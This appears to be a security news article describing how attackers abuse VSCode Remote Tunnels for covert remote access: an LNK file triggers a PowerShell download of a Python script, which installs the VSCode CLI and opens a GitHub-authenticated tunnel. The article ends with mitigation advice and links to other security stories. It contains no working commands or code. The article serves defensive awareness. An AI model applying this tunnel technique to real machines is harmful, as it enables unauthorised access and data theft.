VSCode Remote Tunnels, a legitimate feature of the popular development environment, are increasingly being used by malicious actors.
This feature allows developers to remotely access their local coding environment, which promotes engagement and flexibility.
Using this feature, malicious actors install files or scripts that install the VSCode CLI and create a remote tunnel without the user’s awareness.
This allows attackers illegal access to the developer’s device, enabling them to steal confidential data, deploy malware, and move laterally over the network.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
According to On the Hunt’s blog post, the malicious LNK file that is initially delivered includes a PowerShell command that allows the user to download and execute a Python script from a remote IP address.
The VSCode CLI binary, code-insiders.exe, is downloaded and executed by a Python script. A Python script uses the CLI binaries against Github to generate and authenticate a VSCode tunnel.
A remote tunnel for VSCode is created and the threat actor uses the tunnel created via a web browser to execute commands on a Python payload.
To authenticate to VSCode without utilizing the attacker’s GitHub account, the connect to tunnel button is pressed.
Once verified with the account, a list of remote hosts with active tunnels can be observed. Selecting the online victim host will connect to the VSCode remote tunnel running on that host.
This now makes traversing directories on the victim’s remote computer possible. Additionally, it is also possible to create new files or scripts and run them remotely.
It is advisable for organizations to restrict access to remote tunnels to their own tenants. If it’s not feasible, tunnel use within the estate should be prohibited, or measures to prevent their misuse should be implemented.
Therefore, companies may safeguard their sensitive data and protect the integrity of their development environments by taking proactive measures to combat this new threat.
Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar
A sophisticated phishing campaign, identified by Microsoft Threat Intelligence, has been exploiting a technique known…
Researchers observed a sophisticated cyber-espionage campaign led by the Chinese state-sponsored group known as "Salt…
A high-severity security vulnerability, identified as CVE-2024-21966, has been discovered in the AMD Ryzen™ Master…
Researchers have uncovered a high-severity SQL injection vulnerability, CVE-2025-1094, affecting PostgreSQL’s interactive terminal tool, psql. …
A newly disclosed high-severity vulnerability in WinZip, tracked as CVE-2025-1240, enables remote attackers to execute…
Palo Alto Networks has released a patch for a high-severity authentication bypass vulnerability, identified as…